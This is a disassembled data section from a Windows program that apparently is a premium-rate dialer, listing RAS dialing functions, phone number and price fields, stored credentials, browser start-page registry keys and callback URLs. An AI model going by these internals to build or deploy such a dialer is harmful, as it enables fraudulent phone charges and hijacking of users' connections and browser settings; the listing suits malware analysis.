; "Software\\Microsoft\\Windows\\CurrentVersi"...
; LPCSTR off_40F284
off_40F284 dd offset aProgramfilesdi ; DATA XREF: sub_4039C0+2A6�r
; "ProgramFilesDir"
; LPCSTR lpString
lpString dd offset aDelsim ; DATA XREF: sub_4039C0+391�r
; "delsim"
; LPCSTR lpFile
lpFile dd offset aHttpWww_traffi ; DATA XREF: sub_405C90+FD�r
; "http://www.trafficjam.nl/?failed=initia"...
aHttpWww_traffi db 'http://www.trafficjam.nl/?failed=initialize',0
; DATA XREF: .data:lpFile�o
aDelsim db 'delsim',0 ; DATA XREF: .data:lpString�o
align 4
aProgramfilesdi db 'ProgramFilesDir',0 ; DATA XREF: .data:off_40F284�o
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion',0
; DATA XREF: .data:off_40F280�o
align 10h
aInternetprofil db 'InternetProfile',0 ; DATA XREF: .data:off_40F27C�o
aDefault db 'Default',0 ; DATA XREF: .data:lpValueName�o
aRemoteaccess db 'RemoteAccess',0 ; DATA XREF: .data:lpSubKey�o
align 4
aStartPage db 'Start Page',0 ; DATA XREF: .data:0040F270�o
align 4
aSoftwareMicros db 'Software\Microsoft\Internet Explorer\Main',0
; DATA XREF: .data:0040F26C�o
align 10h
aStartMenu db 'Start Menu',0 ; DATA XREF: .data:off_40F268�o
align 4
aDesktop db 'Desktop',0 ; DATA XREF: .data:0040F264�o
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
; DATA XREF: .data:off_40F260�o
align 4
byte_40F3B8 db 1 ; DATA XREF: sub_4064E0:loc_40650C�r
; sub_4064E0+4B�w
align 4
; char Operation[]
Operation db 'open',0 ; DATA XREF: sub_404FF0+B�o
align 4
; char aLasterror[]
aLasterror db '&lasterror=',0 ; DATA XREF: sub_4051A0+2E1�o
; sub_4051A0:loc_40548E�o ...
; char aLinenumber[]
aLinenumber db '&linenumber=',0 ; DATA XREF: sub_4051A0+292�o
; sub_4051A0:loc_40543F�o ...
align 10h
; char aErrorFatalFile[]
aErrorFatalFile db 'error=fatal&filename=',0 ; DATA XREF: sub_4051A0+243�o
; sub_4051A0:loc_4053F0�o ...
align 4
asc_40F3F8: ; DATA XREF: sub_4051A0+202�o
unicode 0, <&>,0
; char String[]
String db '?',0 ; DATA XREF: sub_4051A0+1F9�o
align 10h
; char aResourceLdNotF[]
aResourceLdNotF db 'resource %ld not found',0 ; DATA XREF: sub_4055A0+37�o
align 4
; char aIsdn[]
aIsdn db 'isdn',0 ; DATA XREF: sub_405C90+627�o
; sub_409720+28�o
align 10h
; char aModem[]
aModem db 'modem',0 ; DATA XREF: sub_405C90+617�o
; sub_409720+1C�o
align 4
; char Mem[]
Mem db 'D:\Work\Splendo\Dialer\working\dialer hidden_ip2code_code2nrs_uni'
; DATA XREF: sub_405C90+4E0�o
db 'nst\InternetDialer\C++ Sources\Dialer\BsdMainDlg.cpp',0
align 10h
aXx db 'xx',0 ; DATA XREF: sub_405C90+174�o
; sub_406720+32C�o ...
align 4
; char aS[]
aS db '%s',0 ; DATA XREF: sub_406670+5B�o
align 4
; char aDialDS[]
aDialDS db 'Dial: %d - %s',0 ; DATA XREF: sub_406720+244�o
align 4
; char aUpdateentryDS[]
aUpdateentryDS db 'UpdateEntry: %d - %s',0 ; DATA XREF: sub_406720+1E3�o
align 10h
; char aCc[]
aCc db 'cc',0 ; DATA XREF: sub_406E60+8DE�o
; sub_408980+1B6�o ...
align 4
; char aPrice2[]
aPrice2 db 'price2',0 ; DATA XREF: sub_406E60+8C7�o
; sub_407820+562�o
align 4
; char aPrice1[]
aPrice1 db 'price1',0 ; DATA XREF: sub_406E60+8AD�o
; sub_407820+5D7�o
align 4
; char aPhonenumber2[]
aPhonenumber2 db 'phonenumber2',0 ; DATA XREF: sub_406E60+893�o
; sub_407820+548�o ...
align 4
; char aPhonenumber1[]
aPhonenumber1 db 'phonenumber1',0 ; DATA XREF: sub_406E60+879�o
; sub_407820+5BD�o ...
align 4
aXx_0 db 'XX',0 ; DATA XREF: sub_406E60+559�o
align 4
aCountrycode db 'countrycode',0 ; DATA XREF: sub_406E60+289�o
aPrice db 'price',0 ; DATA XREF: sub_406E60+238�o
; sub_407820+252�o
align 4
aRealnumber db 'realnumber',0 ; DATA XREF: sub_406E60+1EA�o
; sub_407820+21E�o
align 4
aCall db 'call',0 ; DATA XREF: sub_406E60+1B9�o
; sub_407820+1ED�o
align 10h
aCallrecords_0 db '/callrecords',0 ; DATA XREF: sub_406E60+19C�o
; sub_407820+1D0�o
align 10h
aCallrecords db 'callrecords',0 ; DATA XREF: sub_406E60+176�o
; sub_407820+1AA�o
aHttpPrs_payp_0 db 'http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp',0
; DATA XREF: sub_406E60+74�o
align 4
aDel db 'del',0 ; DATA XREF: sub_406E60+56�o
; sub_407820+56�o
aHttpPrs_payper db 'http://prs.payperdownload.nl',0 ; DATA XREF: sub_406E60+18�o
; sub_406E60+3F�o ...
align 4
aHttpPrs_payp_1 db 'http://prs.payperdownload.nl/radius/dialer_admin/geoip2.asp?cc=',0
; DATA XREF: sub_407820+6E�o
; char aPrefix[]
aPrefix db 'Prefix',0 ; DATA XREF: sub_4084F0+1B9�o
; sub_4086F0+1B6�o ...
align 4
; char a2_0[]
a2_0 db '2.0',0 ; DATA XREF: sub_408BE0+6�o
; char aConnecttime[]
aConnecttime db 'connecttime',0 ; DATA XREF: sub_408FC0+135�o
; sub_409190+F7�o
; char aPassword2[]
aPassword2 db 'password2',0 ; DATA XREF: sub_408FC0+E9�o
; sub_409190+DD�o
align 10h
; char aPassword1[]
aPassword1 db 'password1',0 ; DATA XREF: sub_408FC0+D0�o
; sub_409190+C4�o
align 4
; char aUsername2[]
aUsername2 db 'username2',0 ; DATA XREF: sub_408FC0+B3�o
; sub_409190+AB�o
align 4
; char aUsername1[]
aUsername1 db 'username1',0 ; DATA XREF: sub_408FC0+96�o
; sub_409190+92�o
align 4
; char aSerial[]
aSerial db 'serial',0 ; DATA XREF: sub_408FC0+79�o
; sub_409190+75�o
align 4
; char cbData[]
cbData db 'version',0 ; DATA XREF: sub_408FC0+54�o
; sub_409190+5A�o
; char aRassetentrydia[]
aRassetentrydia db 'RasSetEntryDialParamsA',0 ; DATA XREF: sub_409520+A6�o
align 4
; char aRasgetconnects[]
aRasgetconnects db 'RasGetConnectStatusA',0 ; DATA XREF: sub_409520+9C�o
align 4
; char aRasenumconnect[]
aRasenumconnect db 'RasEnumConnectionsA',0 ; DATA XREF: sub_409520+86�o
; char aRashangupa[]
aRashangupa db 'RasHangUpA',0 ; DATA XREF: sub_409520+76�o
align 4
; char aRassetentrypro[]
aRassetentrypro db 'RasSetEntryPropertiesA',0 ; DATA XREF: sub_409520+6C�o
align 4
; char aRasgetentrypro[]
aRasgetentrypro db 'RasGetEntryPropertiesA',0 ; DATA XREF: sub_409520+56�o
align 4
; char aRasgeterrorstr[]
aRasgeterrorstr db 'RasGetErrorStringA',0 ; DATA XREF: sub_409520+46�o
align 4
; char aRasdiala[]
aRasdiala db 'RasDialA',0 ; DATA XREF: sub_409520+3C�o
align 4
; char aRasenumdevices[]
aRasenumdevices db 'RasEnumDevicesA',0 ; DATA XREF: sub_409520+2C�o
; char aRasapi32_dll[]
aRasapi32_dll db 'RASAPI32.DLL',0 ; DATA XREF: sub_409520:loc_409530�o
align 4
; char asc_40F704[]
asc_40F704: ; DATA XREF: sub_409840+14A�o
unicode 0, < >,0
; char asc_40F708[]
asc_40F708: ; DATA XREF: sub_409BD0+27�o
unicode 0, <,>,0
; char aShgetfolderpat[]
aShgetfolderpat db 'SHGetFolderPathA',0 ; DATA XREF: sub_40A620:loc_40A642�o
align 10h
; char aShfolder_dll[]
aShfolder_dll db 'SHFolder.dll',0 ; DATA XREF: sub_40A680+37�o
align 10h
; char aShell32_dll[]
aShell32_dll db 'Shell32.dll',0 ; DATA XREF: sub_40A680+1B�o
; char a2x[]
a2x db '%%%2x',0 ; DATA XREF: sub_40AA70+66�o
align 10h
dword_40F750 dd 1 ; DATA XREF: sub_40B575+C�o
dword_40F754 dd 16h ; DATA XREF: sub_40B575:loc_40B5AA�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_40F8B8 dd offset word_40F8C2 ; DATA XREF: sub_40B283:loc_40B2B3�r
; sub_40B283:loc_40B370�r ...
dd offset word_40F8C2
db 2 dup(0)
word_40F8C2 dw 20h ; DATA XREF: .data:off_40F8B8�o
; .data:0040F8BC�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_40FAC4 dd 1 ; DATA XREF: sub_40B283:loc_40B29B�r
; sub_40B283:loc_40B358�r ...
dd 2Eh, 1
dword_40FAD0 dd 19930520h, 3 dup(0) ; DATA XREF: .text:0040BC2B�o
; sub_40BC32+2�o
dword_40FAE0 dd 0 ; DATA XREF: sub_4010C0+31�o
; sub_4010C0+36�o ...
align 8
; HINSTANCE hInstance
hInstance dd 0 ; DATA XREF: sub_404DC0+3B�r
dd 3 dup(0)
; HANDLE hHeap
hHeap dd 0 ; DATA XREF: sub_4010C0+9B�w
; sub_4010C0:loc_40118C�r ...
dd 6 dup(0)
; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <0> ; DATA XREF: sub_404DC0+C�o
; sub_404DC0+1F�o ...
dd 6 dup(0)
dword_40FB44 dd 0 ; DATA XREF: sub_4010C0+4A�w
dword_40FB48 dd 0 ; DATA XREF: sub_404DC0+1A�r
; sub_404DC0+27�w ...
align 10h
dword_40FB50 dd 0 ; DATA XREF: sub_4010C0+21�w
dword_40FB54 dd 0 ; DATA XREF: sub_4010C0+D4�w
; sub_4010C0+101�r ...
; DWORD dwFlags
dwFlags dd 0 ; DATA XREF: sub_4010C0+EA�w
; sub_4010C0+F6�r ...
dword_40FB5C dd 0 ; DATA XREF: sub_40AE50:loc_40AE70�r
; sub_40AE50+28�w
dd 0
dword_40FB64 dd 0 ; DATA XREF: sub_4010C0+12F�w
align 10h
dword_40FB70 dd 0Ah dup(0) ; DATA XREF: sub_4010C0+2C�o
dword_40FB98 dd 0 ; DATA XREF: sub_4010C0+73�w
dword_40FB9C dd 0 ; DATA XREF: sub_4010C0+7F�w
dword_40FBA0 dd 0 ; DATA XREF: sub_4010C0+84�w
dword_40FBA4 dd 0 ; DATA XREF: sub_4010C0+8A�w
dword_40FBA8 dd 0 ; DATA XREF: sub_4010C0+36�w
; sub_4010C0+195�r ...
align 10h
dword_40FBB0 dd 0 ; DATA XREF: sub_402FF0+F1�w
; sub_402FF0+116�o
word_40FBB4 dw 0 ; DATA XREF: sub_402FF0+DE�w
; sub_402FF0:loc_403174�r
align 4
dword_40FBB8 dd 0 ; DATA XREF: sub_402FF0+F6�w
word_40FBBC dw 0 ; DATA XREF: sub_402FF0+FC�w
align 10h
dword_40FBC0 dd 0 ; DATA XREF: sub_402FF0+105�w
word_40FBC4 dw 0 ; DATA XREF: sub_402FF0+10B�w
align 4
dword_40FBC8 dd 0 ; DATA XREF: sub_402FF0+133�o
; sub_405830+25B�r ...
; LPVOID lpMem
lpMem dd 0 ; DATA XREF: sub_4010C0+3C2�w
; sub_4010C0+3CE�r ...
dword_40FBD0 dd 0 ; DATA XREF: sub_406720:loc_40699A�w
; sub_406720+2BF�r ...
; LPCSTR dword_40FBD4
dword_40FBD4 dd 0 ; DATA XREF: sub_405500�r
; sub_405500+17�w ...
; char dword_40FBD8[]
dword_40FBD8 dd 0 ; DATA XREF: sub_405830+282�o
; sub_409840+77�o ...
dword_40FBDC dd 0 ; DATA XREF: sub_409CE0+6D�w
; .text:00409D8A�r
dword_40FBE0 dd 0 ; DATA XREF: sub_40B283+1B9�w
; sub_40B575+2A�w ...
dword_40FBE4 dd 0 ; DATA XREF: sub_40B575+6�w
dd 6 dup(0)
dd 8 dup(?)
byte_40FC20 db ? ; DATA XREF: sub_40AFB0+2D�w
align 4
dword_40FC24 dd ? ; DATA XREF: sub_40AFB0+27�w
dword_40FC28 dd ? ; DATA XREF: sub_40AFB0+4�r
; sub_40AFB0+8B�w
align 10h
dword_40FC30 dd ? ; DATA XREF: sub_40B4C8+1E�r
; sub_40B50B+27�w
dword_40FC34 dd ? ; DATA XREF: sub_40B4C8+27�r
; sub_40B50B+2C�w
dword_40FC38 dd ? ; DATA XREF: sub_40B7C4+28�r
; sub_40B7C4+4C�w ...
dd 2 dup(?)
; LCID Locale
Locale dd ? ; DATA XREF: sub_40B5DC+4�r
; sub_40B5DC+9F�r ...
dd 3 dup(?)
dword_40FC54 dd ? ; DATA XREF: sub_40B7C4+C0�r
; sub_40BA13+A6�r
dd ?
dword_40FC5C dd ? ; DATA XREF: sub_40BA13+26�r
; sub_40BA13:loc_40BA7D�w
byte_40FC60 db ? ; DATA XREF: sub_402FF0:loc_4030B7�r
; sub_402FF0+E7�w
align 4
dword_40FC64 dd ? ; DATA XREF: sub_40AFB0+3E�r
dword_40FC68 dd ? ; DATA XREF: sub_40AFB0+35�r
; sub_40AFB0+57�r
_data ends
end start